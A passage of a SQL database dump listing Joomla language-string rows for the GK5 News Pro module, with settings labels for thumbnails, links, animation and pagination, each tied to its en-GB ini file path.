order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2787,'MOD_NEWS_PRO_GK5_LINKS_READMORE','Display readmore','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2788,'MOD_NEWS_PRO_GK5_LINKS_READMORE_DESC','You can display readmore for the links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2789,'MOD_NEWS_PRO_GK5_NEWS_LIMIT_TYPE','Text limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2790,'MOD_NEWS_PRO_GK5_WORDS','Words','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2791,'MOD_NEWS_PRO_GK5_CHARS','Chars','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2792,'MOD_NEWS_PRO_GK5_NEWS_MAX_AMOUNT','Text limit value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2793,'MOD_NEWS_PRO_GK5_TITLE_LIMIT_TYPE','Title limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2794,'MOD_NEWS_PRO_GK5_TITLE_MAX_AMOUNT','Title limit value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2795,'MOD_NEWS_PRO_GK5_NEWS_HEADER_ENABLED','Header enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2796,'MOD_NEWS_PRO_GK5_NEWS_IMAGE_ENABLED','Image enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2797,'MOD_NEWS_PRO_GK5_NEWS_TEXT_ENABLED','Text enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2798,'MOD_NEWS_PRO_GK5_NEWS_INFO_ENABLED','Info enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2799,'MOD_NEWS_PRO_GK5_NEWS_READMORE_ENABLED','Readmore enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2800,'MOD_NEWS_PRO_GK5_NEWS_HEADER_ENABLED_DESC','Enable/disable article header','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2801,'MOD_NEWS_PRO_GK5_NEWS_IMAGE_ENABLED_DESC','Enable/disable article image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2802,'MOD_NEWS_PRO_GK5_NEWS_TEXT_ENABLED_DESC','Enable/disable article text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2803,'MOD_NEWS_PRO_GK5_NEWS_INFO_ENABLED_DESC','Enable/disable article info','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2804,'MOD_NEWS_PRO_GK5_NEWS_READMORE_ENABLED_DESC','Enable/disable article readmore','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2805,'MOD_NEWS_PRO_GK5_INFO2_FORMAT','Second info format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2806,'MOD_NEWS_PRO_GK5_INFO2_FORMAT_DESC','Format based on strings: %AUTHOR %DATE %HITS %CATEGORY %RATE.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2807,'MOD_NEWS_PRO_GK5_INFO2_ORDER','Second information order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2808,'MOD_NEWS_PRO_GK5_NEWS_INFO2_ENABLED','Second info enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2809,'MOD_NEWS_PRO_GK5_NEWS_INFO2_ENABLED_DESC','Enable/disable article second info','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2810,'MOD_NEWS_PRO_GK5_INFO2_POS','Second information position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2811,'MOD_NEWS_PRO_GK5_INFO2_FLOAT','Second information floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2812,'MOD_NEWS_PRO_GK5_USER_AVATAR','Show author avatar','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2813,'MOD_NEWS_PRO_GK5_USER_AVATAR_DESC','Enable/disable showing author avatar from Gravatar.com service','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2814,'MOD_NEWS_PRO_GK5_AVATAR_SIZE','Avatar size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2815,'MOD_NEWS_PRO_GK5_AVATAR_SIZE_DESC','You can specify size of the avatar in pixels - default: 16 x 16 px','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2816,'MOD_NEWS_PRO_GK5_ARTICLES_LINK','Link under articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2817,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_DESC','You can display a link under the articles list','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2818,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_URL','Link URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2819,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_URL_DESC','This URL will be used in the link under the articles list','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2820,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_LABEL','Link label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2821,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_LABEL_DESC','You can specify the links label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2822,'MOD_NEWS_PRO_GK5_ARTICLES_LINK_LABEL_DEFAULT','More from this category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2823,'MOD_NEWS_PRO_GK5_LINKS_MARGIN','Links block margin','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2824,'MOD_NEWS_PRO_GK5_LINKS_MARGIN_DESC','You can define margin for links block as a CSS value (i.e: 10px 0 15px 0)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2825,'MOD_NEWS_PRO_GK5_LINKS_POSITION','Links position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2826,'MOD_NEWS_PRO_GK5_LINKS_POSITION_DESC','Position of block with links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2827,'MOD_NEWS_PRO_GK5_BOTTOM','Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2828,'MOD_NEWS_PRO_GK5_LINKS_WIDTH','Links block width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2829,'MOD_NEWS_PRO_GK5_LINKS_WIDTH_DESC','Percentage width of block with links - used only for block with links positioned to left or right','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2830,'MOD_NEWS_PRO_GK5_NEWS_SHORT_PAGES_AMOUNT','Amount of pages with links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2831,'MOD_NEWS_PRO_GK5_NEWS_SHORT_PAGES_AMOUNT_DESC','Amount of pages with article links. If set to 0 it disables pages with links completely.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2832,'MOD_NEWS_PRO_GK5_LINKSAMOUNT','Amount of links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2833,'MOD_NEWS_PRO_GK5_LINKSAMOUNT_DESC','Amount of links per page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2834,'MOD_NEWS_PRO_GK5_LINKSCOLAMOUNT','Amount of links columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2835,'MOD_NEWS_PRO_GK5_LINKSCOLAMOUNT_DESC','Amount of links columns in links section','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2836,'MOD_NEWS_PRO_GK5_LINKS_IMAGE','Display images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2837,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_DESC','You can display small image on the left or right side of the links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2838,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_LINK','Image links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2839,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_LINK_DESC','You can display links for the links images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2840,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_POSITION','Link image position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2841,'MOD_NEWS_PRO_GK5_LIST_TITLE_LIMIT_TYPE','Title text limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2842,'MOD_NEWS_PRO_GK5_LIST_TITLE_MAX_AMOUNT','List title limit value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2843,'MOD_NEWS_PRO_GK5_LIST_TEXT_LIMIT_TYPE','Description text limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2844,'MOD_NEWS_PRO_GK5_LIST_TEXT_MAX_AMOUNT','List text limit value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2845,'MOD_NEWS_PRO_GK5_LINKS_TITLE','Link under links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2846,'MOD_NEWS_PRO_GK5_LINKS_TITLE_DESC','You can display a link under the links list','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2847,'MOD_NEWS_PRO_GK5_LINKS_TITLE_URL','Link URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2848,'MOD_NEWS_PRO_GK5_LINKS_TITLE_URL_DESC','This URL will be used in the link under the links list','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2849,'MOD_NEWS_PRO_GK5_LINKS_TITLE_LABEL','Link label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2850,'MOD_NEWS_PRO_GK5_LINKS_TITLE_LABEL_DESC','You can specify the links label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2851,'MOD_NEWS_PRO_GK5_LINKS_TITLE_LABEL_DEFAULT','More from this category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2852,'MOD_NEWS_PRO_GK5_USE_CURL_DOWNLOAD','Use cURL download for external images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2853,'MOD_NEWS_PRO_GK5_USE_CURL_DOWNLOAD_DESC','If you have external images or images with absolute paths on the articles and you want to create the thumbnails from these images then you can enable this option. Please remember that you should have permissions to download these images. It will be saved on the cache directory in the downloaded/ catalog. Please remember that first load can take longer time. We don\'t recommend to use this option for modules with frequently changing articles, because it can slow the page loading speed due additional data requests.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2854,'MOD_NEWS_PRO_GK5_RESPONSIVE_IMAGES','Responsive images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2855,'MOD_NEWS_PRO_GK5_RESPONSIVE_IMAGES_DESC','When this option is enabled then image always scales up to the 100% width - very useful on the responsive web design layouts.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2856,'MOD_NEWS_PRO_GK5_WRAP_CONTENT','Wrap content','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2857,'MOD_NEWS_PRO_GK5_WRAP_CONTENT_DESC','If you want to achieve news layout where the image is at left side and the rest of content is at the right side, please enable this option, then the Image must be set in the article layout as first and should be floated to left.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2858,'MOD_NEWS_PRO_GK5_MEMORY_LIMIT','Memory limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2859,'MOD_NEWS_PRO_GK5_MEMORY_LIMIT_DESC','Use this option if you exceed your memory limit during module work or you set the memory limit in the other place to different value.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2860,'MOD_NEWS_PRO_GK5_CREATE_THUMBS','Create thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2861,'MOD_NEWS_PRO_GK5_CREATE_THUMBS_DESC','Use PHP GD library to generate thumbnails from article images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2862,'MOD_NEWS_PRO_GK5_IMAGE_AUTO_SCALE','Image auto-scale','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2863,'MOD_NEWS_PRO_GK5_IMAGE_AUTO_SCALE_DESC','Automatically center image and zoom to the specific size. It works only when image stretch and keep aspect ratio options are disabled.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2864,'MOD_NEWS_PRO_GK5_IMAGE_KEEP_ASPECT_RATIO','Keep aspect ratio','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2865,'MOD_NEWS_PRO_GK5_IMAGE_KEEP_ASPECT_RATIO_DESC','Use this option when you want to keep aspect ratio of created thumbnails. Then thumbnail width and height options mean maximal possible dimensions.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2866,'MOD_NEWS_PRO_GK5_IMAGE_W','Thumbnail dimensions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2867,'MOD_NEWS_PRO_GK5_IMAGE_W_DESC','Thumbnail dimensions in pixels','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2868,'MOD_NEWS_PRO_GK5_IMAGE_H','Thumbnail dimensions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2869,'MOD_NEWS_PRO_GK5_IMAGE_H_DESC','Thumbnail height in pixels','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2870,'MOD_NEWS_PRO_GK5_IMAGE_MARGIN','Image margin','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2871,'MOD_NEWS_PRO_GK5_IMAGE_MARGIN_DESC','You can define margin for images as a CSS value (i.e: 3px 5px 3px 5px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2872,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_W','Links thumbnail dimensions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2873,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_H','Links thumbnail dimensions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2874,'MOD_NEWS_PRO_GK5_LINKS_IMAGE_MARGIN','Links image margin','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2875,'MOD_NEWS_PRO_GK5_IMAGE_BG','Thumbnail background','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2876,'MOD_NEWS_PRO_GK5_IMAGE_BG_DESC','Thumbnail background as hex value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2877,'MOD_NEWS_PRO_GK5_IMAGE_STRETCH','Thumbnail stretch','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2878,'MOD_NEWS_PRO_GK5_IMAGE_STRETCH_DESC','Thumbnail stretching','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2879,'MOD_NEWS_PRO_GK5_IMAGE_QUALITY','Thumbnail quality','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2880,'MOD_NEWS_PRO_GK5_IMAGE_QUALITY_DESC','Thumbnail quality for generated images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2881,'MOD_NEWS_PRO_GK5_CACHE_TIME','Cache time','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2882,'MOD_NEWS_PRO_GK5_CACHE_TIME_DESC','Cache time in minutes, recommended due to efficiency reasons','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2883,'MOD_NEWS_PRO_GK5_LINE_FILTERS','Image filters','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2884,'MOD_NEWS_PRO_GK5_LINE_FILTERS_DESC','You can apply one or more filters to your thumbnails - please remember that the filters are evaluated in the same order as in the list below.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2885,'MOD_NEWS_PRO_GK5_GRAYSCALE_FILTER','Grayscale','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2886,'MOD_NEWS_PRO_GK5_GRAYSCALE_FILTER_DESC','Enable grayscale filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2887,'MOD_NEWS_PRO_GK5_SEPIA_FILTER','Sepia','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2888,'MOD_NEWS_PRO_GK5_SEPIA_FILTER_DESC','Enable sepia filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2889,'MOD_NEWS_PRO_GK5_BLUR_FILTER','Blur','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2890,'MOD_NEWS_PRO_GK5_BLUR_FILTER_DESC','Enable blur filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2891,'MOD_NEWS_PRO_GK5_BRIGHTNESS_FILTER','Brightness','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2892,'MOD_NEWS_PRO_GK5_BRIGHTNESS_FILTER_DESC','Enable brightness filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2893,'MOD_NEWS_PRO_GK5_SMOOTH_FILTER','Smooth','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2894,'MOD_NEWS_PRO_GK5_SMOOTH_FILTER_DESC','Enable smooth filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2895,'MOD_NEWS_PRO_GK5_PIXELATE_FILTER','Pixelate','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2896,'MOD_NEWS_PRO_GK5_PIXELATE_FILTER_DESC','Enable pixelate filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2897,'MOD_NEWS_PRO_GK5_CONTRAST_FILTER','Contrast','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2898,'MOD_NEWS_PRO_GK5_CONTRAST_FILTER_DESC','Enable contrast filter for thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2899,'MOD_NEWS_PRO_GK5_FILTER_ARG','Filter argument','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2900,'MOD_NEWS_PRO_GK5_FILTER_ARG_DESC','Specifies the value of the first filter argument for brightness, smooth, pixelate and contrast filters.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2901,'MOD_NEWS_PRO_GK5_SIMPLE_CROP','Deafult image crop settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2902,'MOD_NEWS_PRO_GK5_SIMPLE_CROP_DESC','You can specify here the default crop settings for images. These settings will be used if the image doesn\'t have duplicates with _noscale and _nocrop settings and if the image isn\'t qualified to the crop rules.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2903,'MOD_NEWS_PRO_GK5_CROP_RULES','Crop rules','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2904,'MOD_NEWS_PRO_GK5_CROP_RULES_DESC','You can define two types of crop rules: connected with the class name used in the image and connected with the image size. The first type has following syntax: CLASS_NAME=TOP:RIGHT:BOTTOM:LEFT; where TOP/RIGHT/BOTTOM/LEFT are crop values in pixels. The second type of rules has following syntax: WIDTH:HEIGHT=TOP:RIGHT:BOTTOM:LEFT; where WIDTH and HEIGHT are dimensions of the image to crop.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2905,'MOD_NEWS_PRO_GK5_TOP_INTERFACE_STYLE','Pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2906,'MOD_NEWS_PRO_GK5_BOTTOM_INTERFACE_STYLE','Pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2907,'MOD_NEWS_PRO_GK5_NONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2908,'MOD_NEWS_PRO_GK5_ARROWS','Arrows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2909,'MOD_NEWS_PRO_GK5_PAGINATION','Pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2910,'MOD_NEWS_PRO_GK5_ARROWS_WITH_PAGINATION','Arrows with pagination','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2911,'MOD_NEWS_PRO_GK5_OPEN_LINKS_WINDOW','Open links in:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2912,'MOD_NEWS_PRO_GK5_SAME_WINDOW','The same window','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2913,'MOD_NEWS_PRO_GK5_BLANK_WINDOW','The new window','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2914,'MOD_NEWS_PRO_GK5_CLEANXHTML','Clean HTML code in the text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2915,'MOD_NEWS_PRO_GK5_CLEANXHTML_DESC','Clean xhtml code from articles text. If this option is disabled then the engine used to clean HTML code will be used to avoid problems with the unclosed tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2916,'MOD_NEWS_PRO_GK5_ALLOWED_TAGS','Allowed HTML tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2917,'MOD_NEWS_PRO_GK5_ALLOWED_TAGS_DESC','You can specify the list of allowed HTML tags separated by comma (i.e. a,p,abbr) when the XHTML clean up is enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2918,'MOD_NEWS_PRO_GK5_MORE_TEXT_VALUE','End of text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2919,'MOD_NEWS_PRO_GK5_MORE_TEXT_VALUE_DESC','Value of end of the text added at the end of every text longer than limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2920,'MOD_NEWS_PRO_GK5_READMORE_TEXT','Read more text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2921,'MOD_NEWS_PRO_GK5_READMORE_TEXT_DESC','Read more text value. If blank then the value from the module language file will be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2922,'MOD_NEWS_PRO_GK5_PARSE','Parse plugins','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2923,'MOD_NEWS_PRO_GK5_PARSE_DESC','Parse plugins code in articles text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2924,'MOD_NEWS_PRO_GK5_CLEANPLUGINS','Clean plugins','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2925,'MOD_NEWS_PRO_GK5_CLEANPLUGINS_DESC','Clean plugins code from articles text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2926,'MOD_NEWS_PRO_GK5_AUTOANIM','Autoanimation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2927,'MOD_NEWS_PRO_GK5_AUTOANIM_DESC','Autoanimation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2928,'MOD_NEWS_PRO_GK5_HOVERANIM','Hover animation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2929,'MOD_NEWS_PRO_GK5_HOVERANIM_DESC','Animation on hover for module pagination (it works only when pagination is enabled)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2930,'MOD_NEWS_PRO_GK5_ANIMSPEED','Animation speed','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2931,'MOD_NEWS_PRO_GK5_ANIMSPEED_DESC','Animation speed in miliseconds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2932,'MOD_NEWS_PRO_GK5_ANIMINTERVAL','Animation interval','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2933,'MOD_NEWS_PRO_GK5_ANIMINTERVAL_DESC','Animation interval for autoanimation in miliseconds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2934,'MOD_NEWS_PRO_GK5_ANIMATION_FUNCTION','Animation transition','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2935,'MOD_NEWS_PRO_GK5_ANIMATION_FUNCTION_DESC','You can specify an animation transition effect','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2936,'MOD_NEWS_PRO_GK5_USECSS','Use default CSS','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2937,'MOD_NEWS_PRO_GK5_USECSS_DESC','Using default CSS module file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2938,'MOD_NEWS_PRO_GK5_AUTOMATIC','Automatic','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2939,'MOD_NEWS_PRO_GK5_FORCEENABLED','Force enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2940,'MOD_NEWS_PRO_GK5_FORCEDISABLED','Force disabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2941,'MOD_NEWS_PRO_GK5_USEJS','Using JS module','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2942,'MOD_NEWS_PRO_GK5_USEJS_DESC','Using engine.js module file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2943,'MOD_NEWS_PRO_GK5_USEOVERRIDES','Use URL overrides','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2944,'MOD_NEWS_PRO_GK5_USEOVERRIDES_DESC','Use URL overrides for articles from the url_overrides.json file from the module main directory','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2945,'MOD_NEWS_PRO_GK5_LINE_ARTICLE_LAYOUT','Article layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2946,'MOD_NEWS_PRO_GK5_LINE_ARTICLE_LAYOUT_DESC','Options connected with the Article layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2947,'MOD_NEWS_PRO_GK5_LINE_HEADER_LAYOUT','Header','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2948,'MOD_NEWS_PRO_GK5_LINE_HEADER_LAYOUT_DESC','Options connected with the Header','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2949,'MOD_NEWS_PRO_GK5_LINE_IMAGE_LAYOUT','Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2950,'MOD_NEWS_PRO_GK5_LINE_IMAGE_LAYOUT_DESC','Options connected with the Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2951,'MOD_NEWS_PRO_GK5_LINE_TEXT_LAYOUT','Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2952,'MOD_NEWS_PRO_GK5_LINE_TEXT_LAYOUT_DESC','Options connected with the 